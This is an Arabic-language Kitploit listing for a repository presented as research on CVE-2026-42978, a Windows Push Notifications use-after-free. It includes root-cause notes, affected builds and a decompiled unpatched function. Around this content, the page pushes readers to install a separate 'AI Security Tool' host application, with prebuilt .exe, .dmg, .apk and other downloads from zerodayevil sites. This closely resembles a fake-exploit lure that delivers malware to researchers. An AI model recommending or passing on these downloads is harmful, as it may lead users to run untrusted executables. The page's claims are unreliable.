Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free & Race Condition PoC بحث، ماسح تشخيصي، ووحدة تدقيق أمني لأداة الأمن بالذكاء الاصطناعي. | Kitploit
أدوات/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
أدوات دفاعيةتصعيد الامتيازاتماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستخبارات التهديداتالأوراق والأبحاثالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free & Race Condition PoC بحث، ماسح تشخيصي، ووحدة تدقيق أمني لأداة الأمن بالذكاء الاصطناعي.

عرض المستودعالموقع الإلكتروني
9423منذ 20 أياملم تتم المراجعة بعد

CVE-2026-42978
وحدة إشعارات Windows Push لأداة الأمن بالذكاء الاصطناعي

منظومة أمنية بالذكاء الاصطناعي من الجيل التالي، طرفية متعددة البروتوكولات ومجموعة وكلاء مستقلين


Latest Release Build Status Donations Telegram Channel License

الموقع الإلكتروني · وثائق المنتج · التطبيق المضيف · دردشة المجتمع

التنقل في الموقع: الرئيسية · التحديثات · التنزيلات · الوحدات

Module banner


التطبيق المضيف الرسمي

المنتج: AI Security Tool
الموقع: zerodayevil.github.io
الوثائق: https://zerodayevil.github.io/ai-security-tool

هذه الوحدة عبارة عن تحليل مُراجَع وملف فحص آمن لأداة AI Security Tool.
استخدم فقط الوحدات المدرجة على موقع المشروع أو في الكتالوج الرسمي. حمّل هذه الوحدة داخل التطبيق المعتمد، ضد نقاط النهاية التي تملكها أو لديك تفويض كتابي لتقييمها.

هذا المستودع لا يتضمن استغلالاً مسلحاً ضد WpnService. المختبر الموجود تحت lab/ هو محاكاة مستقلة لـفئة الخلل (TOCTOU / double-fetch). وهو لا يتواصل مع خدمة الإشعارات الفعلية.


البدء السريع والتثبيت

ثبّت التطبيق المضيف أولاً. ثم فعّل هذه الوحدة من Modules → Windows / Local EoP → CVE-2026-42978.

إصدارات جاهزة للاستخدام

نظام التشغيل / المنصةالإصدارالمعمارية / الصيغةآخر تحديثالحالةالتنزيل
Windowsv6.3.20مثبّت x64 (.exe)2026-09-08الأحدثتنزيل .exe
Windowsv6.3.20محمول x64 (.tar.gz)2026-09-08الأحدثتنزيل .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05مستقرتنزيل .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01مستقرتنزيل .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01مستقرتنزيل .apk

المصادر الرسمية فقط:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

نظرة مفاهيمية عامة

CVE-2026-42978 هو رفع صلاحيات محلي في إشعارات Windows Push. تصفه Microsoft بالوصول المتزامن إلى مورد مشترك دون مزامنة مناسبة (CWE-362). يُظهر البحث على wpncore.dll المُرقَّع مقابل غير المُرقَّع وجود سباق use-after-free في PresentationEndpointFacade أثناء إيقاف تشغيل النظام الأساسي.

يعمل WpnService في الجلسة 0 بصلاحية NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). يمر عبره تسليم الإشعارات المنبثقة والبلاطات والشارات. الفوز بالسباق ضد تلك العملية يمثل مشكلة SYSTEM على الجهاز المحلي — وليس ثغرة بعيدة قبل المصادقة على وحدة تحكم المجال.

الحالة: تم الترقيع في 10 يونيو 2026 (Patch Tuesday). هذه الصفحة بحث دفاعي.

وهي ليست CVE-2026-41089 (Netlogon RCE). مكوّن مختلف، ونموذج صلاحيات مختلف، وتاريخ ترقيع مختلف.


المواصفات

الحقلالقيمة
CVECVE-2026-42978
BDUBDU:2026-08249
إشعار المورّدMSRC — Windows Push Notifications EoP
الخطورةعالية · CVSS 3.1 7.8
نقطة الضعفCWE-362 حالة سباق · use-after-free على مسار الإيقاف
المكوّنWindows Push Notifications · WpnService · wpncore.dll
ناقل الهجوممحلي
الصلاحيات المطلوبةمنخفضة (مستخدم محلي مُصرَّح له)
تفاعل المستخدملا يوجد
Patch Tuesday10 يونيو 2026
نوع الوحدةتحليل بحثي + فحص آمن داخل التطبيق + حزمة كشف

النطاق

إصدارات العميل والخادم التي تتضمن Push Notifications. تحقق من KB الدقيق على MSRC قبل إغلاق أي تذكرة.

العائلةملاحظات
Windows 101809، 21H2، 22H2 (x86 / x64 / ARM64 حسب الاقتضاء)
Windows 1123H2، 24H2، 25H2، 26H1
Windows Server2016 / 2019 / 2022 / 2025 (الكامل وServer Core حيث يوجد المكوّن)

إصدارات إرشادية من ملاحظات الخدمة العامة (تحقق دائماً من MSRC مجدداً):

الفرعالبناء المُرقَّع الإرشادي
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
مثال wpncore.dll (24H2)قابل للاستغلال 26100.8521 → مُرقَّع 26100.8655

السبب الجذري (البحث)

تُغلّف الواجهة (facade) استدعاءات واجهة برمجة الإشعارات وتفوّض إلى PresentationEndpointImpl. أثناء إيقاف تشغيل النظام الأساسي يتم تدمير كائن NotificationPlatform. تاريخياً، كانت عدة طرق في الواجهة تأخذ مؤشر النظام الأساسي دون علم إيقاف أو قفل مشترك. إذا فاز الإنهاء بالسباق، يستخدم الاستدعاء التالي مؤشراً معلّقاً.

Facade, platform, shutdown guard

تم تطبيق نفس نمط القفل والحماية عبر 49 طريقة من PresentationEndpointFacade::*. تُركت طرق التنفيذ تحتها كما هي — كانت الثغرة في الواجهة.

الشكل غير المُرقَّع (wpncore.dll 26100.8521)

// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

الشكل المُرقَّع (wpncore.dll 26100.8655)

تنزيل الأداة